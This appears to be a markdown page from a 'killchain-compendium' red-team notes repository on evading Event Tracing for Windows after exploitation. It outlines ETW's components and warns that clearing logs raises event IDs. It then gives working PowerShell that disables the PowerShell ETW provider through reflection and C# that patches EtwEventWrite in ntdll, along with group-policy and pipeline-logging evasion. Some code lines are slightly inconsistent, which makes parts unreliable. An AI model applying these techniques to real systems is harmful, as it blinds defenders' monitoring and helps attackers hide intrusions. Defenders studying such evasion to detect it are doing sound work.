whx
/
killchain-compendium
1
0
Fork 0
Code Issues Pull Requests Projects Releases Wiki Activity
killchain-compendium/Post Exploitation/Windows/Evade Event Tracing.md

2.4 KiB
Raw Blame History

Evade Event Tracing (ETW)

  • Event Logging
  • Trace Logging
  • Event IDs are used
  • Event Provider generate events
    • Managed Object Format, enabled by a single trace session
    • Windows Software Trace Preprocessor, Trace Message Format, enabled by a single trace session
    • Manifest Based, up to 8 trace sessions
    • TraceLogging, up to 8 trace sessions
  • Event Controller build and configure sessions for events
  • Event Consumer interpret events, parses sessions of selected providers
  • XML data

Log Evasion

  • Deleting logs is tracked by an event ID as well . Do not do it!
    • ID 1102, security audit logs cleared
    • ID 104, log file cleared
    • ID 1100, even service shut down

Techniques

$logProvider = [Ref].Assembly.GetType('System.Management.Automation.Tracing.PSEtwLogProvider')
$etwProvider = $logProvider.GetField('etwProvider','NonPublic,Static').GetValue($null)
[System.Diagnostics.Eventing.EventProvider].GetField('m_enabled','NonPublic,Instance').SetValue($etwProvider,0);

* Group policy takeover
    * Loaded in the same security context as the user
    * GPO providers are script block logging and module logging
    * Event IDs reported are `4103` (Logs command invocation) and `4104` (Logs script block execution)
    * Administrative Templates -> Windows Components -> Windows PowerShell
* Log pipeline abuse
    * `LogPipelineExecutionDetails` has to be set to false
* Type creation
  • Controller
    • Patching EtwEventWrite stored in ntdll.dll via return value modification
var ntdll = Win32.LoadLibrary("ntdll.dll");
var etwFunction = Win32.GetProcAddress(ntdll, "EtwEventWrite");

    * Modify memory permissions

uint oldProtect;
Win32.VirtualProtect(
	etwFunction, 
	(UIntPtr)patch.Length, 
	0x40, 
	out oldProtect
);

    * Copy via `Marshal.Copy`

patch(new byte[] { 0xc2, 0x14, 0x00 });
Marshal.Copy(
	patch, 
	0, 
	etwEventSend, 
	patch.Length
);

    * Clean up

VirtualProtect(etwFunction, 4, oldProtect, &oldOldProtect);

    * Check patched instruction

Win32.FlushInstructionCache(
	etwFunction,
	NULL
);

* Runtime Trace Tampering
  • Consumer
    • Log smashing
    • Log tampering